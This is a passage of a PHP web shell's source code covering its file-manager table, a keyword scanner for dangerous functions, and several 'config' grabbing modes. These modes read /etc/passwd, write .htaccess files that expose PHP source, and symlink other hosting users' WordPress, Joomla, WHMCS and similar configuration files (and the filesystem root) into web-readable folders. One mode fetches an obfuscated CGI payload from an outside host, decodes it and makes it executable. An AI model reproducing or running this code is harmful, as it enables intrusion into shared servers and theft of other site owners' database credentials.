1456<td align="center"><?=$last?></td>
1457<td align="right"><?=$size?> byte</td>
1458<td align="center"><a href="?edit=<?=$file?>&bug=<?=$bugs?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$bugs?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1459</td>
1460</tr>
1461<?php
1462}
1463}
1464}
1465}
1466if($_POST['textV']<>""){
1467$text=$_POST['textV'];
1468 if(@preg_match("/$text/", $op)) {
1469 $i++;
1470?>
1471<tr onmouseover="mover(this)" onmouseout="mout(this)">
1472<td align="center"><?=$i?></td>
1473<td align="center"><?=$text?></td>
1474<td align="left">
1475<a href="?view=<?=$file?>&bug=<?=$val?>" target="_blank" id="<?=clearspace($filn)?>_link"><?=$file?></a><form action="" method="post" id="<?=clearspace($filn)?>_form" class="sembunyi" style="margin:0;padding:0;"><input type="hidden" name="oldname" value="<?=$filn?>" style="margin:0;padding:0;" /><input class="inputz" style="width:200px;" type="text" name="newname" value="<?=$filn?>" /><input class="inputzbut" type="submit" name="rename" value="rename" /><input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');" /></form>
1476</td>
1477<td align="center"><?=substr(sprintf('%o', fileperms($file)),-4)?></td>
1478<td align="center"><?=get_perms($file)?></td>
1479<td align="center"><?=$is_writable?></td>
1480<td align="center"><?=$last?></td>
1481<td align="right"><?=$size?> byte</td>
1482<td align="center"><a href="?edit=<?=$file?>&bug=<?=$text?>" target="_blank">edit</a> | <a href="javascript:tukar('<?=clearspace($filn)?>_link','<?=clearspace($filn)?>_form');">ren</a> | <a href="?delete=<?=$file?>&bug=<?=$text?>" target="_blank">del</a> | <a href="?dl=<?=$file?>&bug=<?=$val?>">down</a>
1483</td>
1484</tr>
1485<?php
1486}
1487}
1488}
1489}
1490}
1491if($i==0){
1492 foreach($cek as $bugs) {
1493 if ($bugs<>""){
1494$x++;
1495?>
1496<tr onmouseover="mover(this)" onmouseout="mout(this)">
1497<td align="center"><?=$x?></td>
1498<td align="center"><?=$bugs?></td>
1499<td align="center">!!!!</td>
1500<td align="center">?????????</td>
1501<td align="center">???</td>
1502<td align="center">not exist</td>
1503<td align="center">no record</td>
1504<td align="right">- byte</td>
1505<td align="center">- | - | - | -</td>
1506</tr>
1507<?php
1508}
1509}
1510}
1511?>
1512<tr><th colspan="9">Founded <?=$i?> Files Scanned</th></tr>
1513</table>
1514<?php
1515}else{
1516?>
1517<center>
1518<?php
1519$find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
1520?>
1521<form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
1522<center>
1523<table class="tabnet" width="200">
1524<tr><th>Select Scan Type</th></tr>
1525<tr><td >
1526<script language="javascript">
1527function cekKlik(){
1528 if (!document.fCheck.cekV.checked)
1529 document.fCheck.textV.disabled=true;
1530 else
1531 document.fCheck.textV.disabled=false;
1532 if(document.fCheck.cekV.checked){
1533 master = master + 1;
1534 }else{
1535 if(master > 0 ){
1536master = master - 1;
1537 }else{
1538master = master;
1539 }
1540 }
1541 if(master != 0){
1542 document.fCheck.Submit.disabled=false;
1543 document.fCheck.Submit.value='Start !';
1544 }else{
1545 document.fCheck.Submit.disabled=true;
1546 document.fCheck.Submit.value='Stop !';
1547 }
1548}
1549</script>
1550<?php
1551foreach($find as $bug) {
1552?>
1553<script language="javascript">
1554var master = 0;
1555function checkValue<?=$bug?>(){
1556 if(document.fCheck.<?=$bug?>.checked){
1557 master = master + 1;
1558 }else{
1559 if(master > 0 ){
1560master = master - 1;
1561 }else{
1562master = master;
1563 }
1564 }
1565 if(master != 0){
1566 document.fCheck.Submit.disabled=false;
1567 document.fCheck.Submit.value='Start !';
1568 }else{
1569 document.fCheck.Submit.disabled=true;
1570 document.fCheck.Submit.value='Stop !';
1571 }
1572}
1573</script>
1574<input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" /> <?=$bug?><br/>
1575<?php
1576}
1577?>
1578<input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
1579<input class="inputz" disabled="disabled" name="textV" value="other_key_word" onFocus="this.select()" type="text" id="textV">
1580<input type="hidden" name="asal" value="abcd"></td>
1581</tr>
1582<tr><th colspan="2">
1583<input disabled="disabled" type="submit" name="Submit" value="Stop !" class="inputzbut"/></form></th>
1584</tr>
1585</table>
1586<?php
1587}
1588?>
1589<?php
1590}
1591elseif(isset($_GET['x']) && ($_GET['x'] == 'configsss'))
1592{
1593?>
1594<form action="?y=<?php echo $pwd; ?>&x=configsss" method="post">
1595<br/><center>
1596[Config] : <span class="gaya">Get With Path</span> <input type="submit" value="Go !" class="inputzbut" name="pathconfig">
1597</center>
1598</form>
1599<?php
1600echo "<center>";
1601if(isset($_POST['pathconfig'])){
1602echo '<form method="post"><textarea width="500" rows="10" name="user" class="outputz">';
1603$users=file("/etc/passwd");
1604foreach($users as $user)
1605{
1606echo $user;
1607}
1608echo '</textarea><br/><br/>[Name] : <input size="35" name="foldername" type="text" value="folder_name" class="inputz"><input class="inputzbut" type="submit" name="pathconfigstart" value="Go !" /></form>';
1609}
1610if(isset($_POST['pathconfigstart'])){
1611$nc = $_POST['foldername'];
1612$dir=mkdir($nc,0755);
1613$r = " Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1614$f = fopen($nc.'/.htaccess','w');
1615fwrite($f,$r);
1616$consym="<a href=".$alamat."/".$nc." style='text-decoration:none;' target='_blank'/>DONE</a>";
1617echo "<span class='gaya'>[</span> $consym <span class='gaya'>]</span>";
1618$usrs=explode("\n",$_POST['user']);
1619$configuration=array("wp-config.php","wp/wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","home/wp-config.php","main/wp-config.php","site/wp-config.php","web/wp-config.php","joomla/configuration.php","blog/configuration.php","home/configuration.php","main/configuration.php","site/configuration.php","web/configuration.php","vb/includes/config.php","includes/config.php","includes/koneksi.php","config/koneksi.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","lib/config.php","includes/configure.php","forum/includes/config.php");
1620foreach($usrs as $us){
1621$usr = explode(":", $us);
1622$usz = $usr['5'];
1623$usx = $usr['0'];
1624foreach($configuration as $c){
1625$rs=$usz."/".$c;
1626$r=$nc."/".$usx." .. ".$c;
1627symlink($rs,$r);
1628}
1629}
1630}
1631}
1632elseif(isset($_GET['x']) && ($_GET['x'] == 'configss'))
1633{
1634?>
1635<form action="?y=<?php echo $pwd; ?>&x=configss" method="post">
1636<br/><center>
1637[Config] : <span class="gaya">Get With Manual</span> <input type="submit" value="Go !" class="inputzbut" name="symlinks">
1638</center>
1639</form>
1640<?php
1641echo "<center>";
1642if (isset($_POST['symlinks'])){
1643echo '<center><form method="post"><table class="tabnet"><th colspan="2">Manual Symlink</th><tr>
1644<td>File Path :</td><td><input class="inputz" type="text" name="filenya" value="/home/'.$user.'/public_html/config.php" size="50"/></td></tr>
1645<tr><td>Symlink Name :</td><td><input class="inputz" type="text" name="symfile" value="config.txt" size="50"/></td></tr>
1646<tr><th colspan="2"><input class="inputzbut" type="submit" value="Symlink" name="symlinkz" /></th></tr></table></form></center>';
1647}
1648$filenya = $_POST['filenya'];
1649$symfile = $_POST['symfile'];
1650if(isset($_POST['symlinkz'])){
1651mkdir('sym',0755);
1652chdir('sym');
1653$rt = "Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1654$fo = fopen('.htaccess','w');
1655fwrite($fo,$rt);
1656symlink($filenya,$symfile);
1657echo '<center><span class="gaya">[</span> <a target="_blank" href="sym/'.$symfile.'" >DONE</a> <span class="gaya">]</span></center>';
1658}
1659}
1660elseif(isset($_GET['x']) && ($_GET['x'] == 'configs'))
1661{
1662?>
1663<form action="?y=<?php echo $pwd; ?>&x=configs" method="post">
1664<br/><center>
1665[Config] : <span class="gaya">Get With Perl</span> <input type="submit" value="Go !" class="inputzbut" name="perlconfig">
1666</center>
1667</form>
1668<?php
1669echo "<center>";
1670$dn = $_POST['dirname'];
1671if(isset($_POST['perlconfig'])){
1672echo '<form method="post">[Name] : <input size="35" name="dirname" type="text" value="folder_name" class="inputz"><input class="inputzbut" type="submit" name="perlconfigstart" value="Go !" /></form>';
1673}
1674if(isset($_POST['perlconfigstart'])){
1675mkdir($dn, 0755);
1676chdir($dn);
1677$kokdosya = ".htaccess";
1678$dosya_adi = "$kokdosya";
1679$dosya = fopen ($dosya_adi , 'w') or die ("Error");
1680$metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1681AddType application/x-httpd-cgi .bin
1682AddHandler cgi-script .bin
1683AddHandler cgi-script .bin";
1684fwrite ( $dosya , $metin ) ;
1685fclose ($dosya);
1686$configshell = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/config.cgi');
1687$file = fopen("config.bin" ,"w+");
1688$write = fwrite ($file ,gzinflate(base64_decode(str_rot13(strrev($configshell)))));
1689fclose($file);
1690chmod("config.bin",0755);
1691$alamat = str_replace($_SERVER['DOCUMENT_ROOT'], "", @getcwd());
1692echo "<span class='gaya'>[</span> <a href='".$alamat."' target='_blank'>DONE</a> <span class='gaya'>]</span><br/><br/><iframe src=".$alamat."/config.bin width=97% height=280px frameborder=0 style='overflow-y:hidden;'></iframe></form>";
1693}
1694}
1695elseif(isset($_GET['x']) && ($_GET['x'] == 'config'))
1696{
1697?>
1698<form action="?y=<?php echo $pwd; ?>&x=config" method="post">
1699<br/><center>
1700[Config] : <span class="gaya">Get With PHP</span> <input type="submit" value="Go !" class="inputzbut" name="phpconfig">
1701</center>
1702</form>
1703<?php
1704echo "<center>";
1705if(isset($_POST['phpconfig'])){
1706echo '<form method="post"><textarea width="500" rows="10" name="user" class="outputz">';
1707$users=file("/etc/passwd");
1708foreach($users as $user)
1709{
1710echo $user;
1711}
1712echo '</textarea><br/><br/>[Name] : <input size="35" name="foldername" type="text" value="folder_name" class="inputz"><input class="inputzbut" type="submit" name="phpconfigstart" value="Go !" /></form>';
1713}
1714if(isset($_POST['phpconfigstart'])){
1715$nc = $_POST['foldername'];
1716$dir=mkdir($nc,0755);
1717$r = " Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1718$f = fopen($nc.'/.htaccess','w');
1719fwrite($f,$r);
1720$consym="<a href=".$alamat."/".$nc." style='text-decoration:none;' target='_blank'/>DONE</a>";
1721echo "<span class='gaya'>[</span> $consym <span class='gaya'>]</span>";
1722$usrs=explode("\n",$_POST['user']);
1723$configuration=array("wp-config.php","wp/wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","home/wp-config.php","main/wp-config.php","site/wp-config.php","web/wp-config.php","joomla/configuration.php","blog/configuration.php","home/configuration.php","main/configuration.php","site/configuration.php","web/configuration.php","vb/includes/config.php","includes/config.php","includes/koneksi.php","config/koneksi.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","lib/config.php","includes/configure.php","forum/includes/config.php");
1724foreach($usrs as $us){
1725$usr = explode(":", $us);
1726$usr[0]."\n";
1727foreach($usr as $uss){
1728$us=trim($uss);
1729foreach($configuration as $c){
1730$rs="/home/".$us."/public_html/".$c;
1731$r=$nc."/".$us." .. ".$c;
1732symlink($rs,$r);
1733}
1734}
1735}
1736}
1737}
1738elseif(isset($_GET['x']) && ($_GET['x'] == 'cms'))
1739{
1740$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
1741@mkdir('tmp',0777);
1742@symlink("/","tmp/root");
1743$htaccss = "Options all
1744 DirectoryIndex syntax.html
1745 AddType text/plain .php
1746 AddHandler server-parsed .php
1747 AddType text/plain .html
1748 AddHandler txt .html
1749 Require None
1750 Satisfy Any";
1751file_put_contents("tmp/.htaccess",$htaccss);
1752if(is_readable("/var/named")){
1753$list = scandir("/var/named");
1754$current_dir = posix_getcwd();
1755$dir = explode("/",$current_dir);
1756foreach($list as $domain){
1757if(strpos($domain,".db"))
1758{
1759$domain = str_replace('.db','',$domain);
1760$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1761error_reporting(0);
1762$current_dir = posix_getcwd();
1763$dir = explode("/",$current_dir);
1764symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1765symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1766symlink($owner['dir'].'/'.$dir[3].'/home/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1767symlink($owner['dir'].'/'.$dir[3].'/main/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1768symlink($owner['dir'].'/'.$dir[3].'/new/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1769symlink($owner['dir'].'/'.$dir[3].'/portal/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1770symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1771symlink($owner['dir'].'/'.$dir[3].'/web/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1772symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1773symlink($owner['dir'].'/'.$dir[3].'/wordpress/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1774symlink($owner['dir'].'/'.$dir[3].'/v1/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1775symlink($owner['dir'].'/'.$dir[3].'/v2/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1776symlink($owner['dir'].'/'.$dir[3].'/v3/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1777symlink($owner['dir'].'/'.$dir[3].'/v4/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1778symlink($owner['dir'].'/'.$dir[3].'/v5/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt');
1779symlink($owner['dir'].'/'.$dir[3].'/config/koneksi.php',"tmp/".$owner['name'].'-Lokomedia.txt');
1780symlink($owner['dir'].'/'.$dir[3].'/konfigurasi/koneksi.php',"tmp/".$owner['name'].'-Formulasi.txt');
1781symlink($owner['dir'].'/'.$dir[3].'/lib/config.php',"tmp/".$owner['name'].'-Balitbang.txt');
1782symlink($owner['dir'].'/'.$dir[3].'/config.php',"tmp/".$owner['name'].'-PhpBB.txt');
1783symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"tmp/".$owner['name'].'-vBulletin.txt');
1784symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1785symlink($owner['dir'].'/'.$dir[3].'/blog/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1786symlink($owner['dir'].'/'.$dir[3].'/home/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1787symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1788symlink($owner['dir'].'/'.$dir[3].'/main/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1789symlink($owner['dir'].'/'.$dir[3].'/new/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1790symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1791symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1792symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1793symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1794symlink($owner['dir'].'/'.$dir[3].'/v1/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1795symlink($owner['dir'].'/'.$dir[3].'/v2/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1796symlink($owner['dir'].'/'.$dir[3].'/v3/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1797symlink($owner['dir'].'/'.$dir[3].'/v4/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1798symlink($owner['dir'].'/'.$dir[3].'/v5/configuration.php',"tmp/".$owner['name'].'-Joomla.txt');
1799symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"tmp/".$owner['name'].'-IPB.txt');
1800symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"tmp/".$owner['name'].'-MyBB.txt');
1801symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"tmp/".$owner['name'].'-SMF.txt');
1802symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"tmp/".$owner['name'].'-Drupal.txt');
1803symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"tmp/".$owner['name'].'-e107.txt');
1804symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"tmp/".$owner['name'].'-Seditio.txt');
1805symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"tmp/".$owner['name'].'-osCommerce.txt');
1806symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1807symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1808symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1809symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1810symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1811symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1812symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1813symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1814symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1815symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1816symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1817symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1818symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt');
1819}
1820}
1821}
1822$etc = file_get_contents("/etc/passwd");
1823$etcz = explode("\n",$etc);
1824foreach($etcz as $etz){
1825$etcc = explode(":",$etz);
1826error_reporting(0);
1827$current_dir = posix_getcwd();
1828$dir = explode("/",$current_dir);
1829symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1830symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1831symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/home/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1832symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/main/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1833symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/new/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1834symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1835symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1836symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1837symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1838symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wordpress/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1839symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v1/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1840symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v2/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1841symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v3/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1842symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v4/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1843symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v5/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt');
1844symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config/koneksi.php','tmp/'.$etcc[0].'-Lokomedia.txt');
1845symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/konfigurasi/koneksi.php','tmp/'.$etcc[0].'-Formulasi.txt');
1846symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/lib/config.php','tmp/'.$etcc[0].'-Balitbang.txt');
1847symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','tmp/'.$etcc[0].'-PhpBB.txt');
1848symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','tmp/'.$etcc[0].'-vBulletin.txt');
1849symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1850symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1851symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/home/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1852symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1853symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/main/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1854symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/new/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1855symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1856symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1857symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1858symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v1/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1859symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v2/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1860symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v3/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1861symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v4/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1862symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v5/configuration.php','tmp/'.$etcc[0].'-Joomla.txt');
1863symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','tmp/'.$etcc[0].'-IPB.txt');
1864symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','tmp/'.$etcc[0].'-MyBB.txt');
1865symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','tmp/'.$etcc[0].'-SMF.txt');
1866symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','tmp/'.$etcc[0].'-Drupal.txt');
1867symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','tmp/'.$etcc[0].'-e107.txt');
1868symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','tmp/'.$etcc[0].'-Seditio.txt');
1869symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','tmp/'.$etcc[0].'-osCommerce.txt');
1870symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1871symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1872symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1873symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1874symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1875symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1876symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1877symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1878symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1879symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1880symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1881symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1882symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt');
1883}
1884function chk_header($link){
1885$tmp = get_headers($link,1);
1886if(strpos($tmp[0],"200")){
1887return true;
1888}else{ return false; }
1889}
1890function Find($str,$start,$end){
1891$len = strlen($str);
1892$start_pos = (strpos($str,$start) + strlen($start));
1893$str = substr($str,$start_pos);
1894$end_pos = strpos($str,$end);
1895$str = substr($str,0,$end_pos);
1896return $str;
1897}
1898$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
1899$u = explode("/",$pageURL );
1900$pageURL =str_replace($u[count($u)-1],"",$pageURL );
1901function cms_add($link,$domain,$owner,$cms){
1902$link = $link.'-'.$cms.'.txt';
1903if(chk_header($link))
1904{
1905$url = 'http://'.$domain;
1906$str = '<tr><td><a href='.$url.' target="_blank">'.$domain.'</a></td><td>'.$owner.'</td><td align="center"><a
1907href='.$link.' target="_blank" class="gaya">'.$cms.'</td>'.Chr(10);
1908file_put_contents("tmp.tmp",$str,FILE_APPEND);
1909echo $str;
1910}
1911}
1912function CurlPage($url,$post = null,$head = true) {
1913$ch = curl_init();
1914curl_setopt($ch, CURLOPT_URL, $url);
1915curl_setopt($ch, CURLOPT_HEADER, $head);
1916curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1917curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1918curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
1919curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
1920curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
1921curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1922curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1923If ($post != NULL){
1924curl_setopt($ch, CURLOPT_POST, 1);
1925curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1926}
1927$urlPage = curl_exec($ch);
1928if(curl_errno($ch)){
1929echo curl_error($ch);
1930}
1931curl_close($ch);
1932return($urlPage);
1933}
1934function listall($file,$str){
1935if(file_exists($file)){
1936$do = file_get_contents($file);
1937if(!strpos($do,$str)){
1938file_put_contents($file,$str,FILE_APPEND);
1939}
1940}else{
1941file_put_contents($file,$str,FILE_APPEND);
1942}
1943}
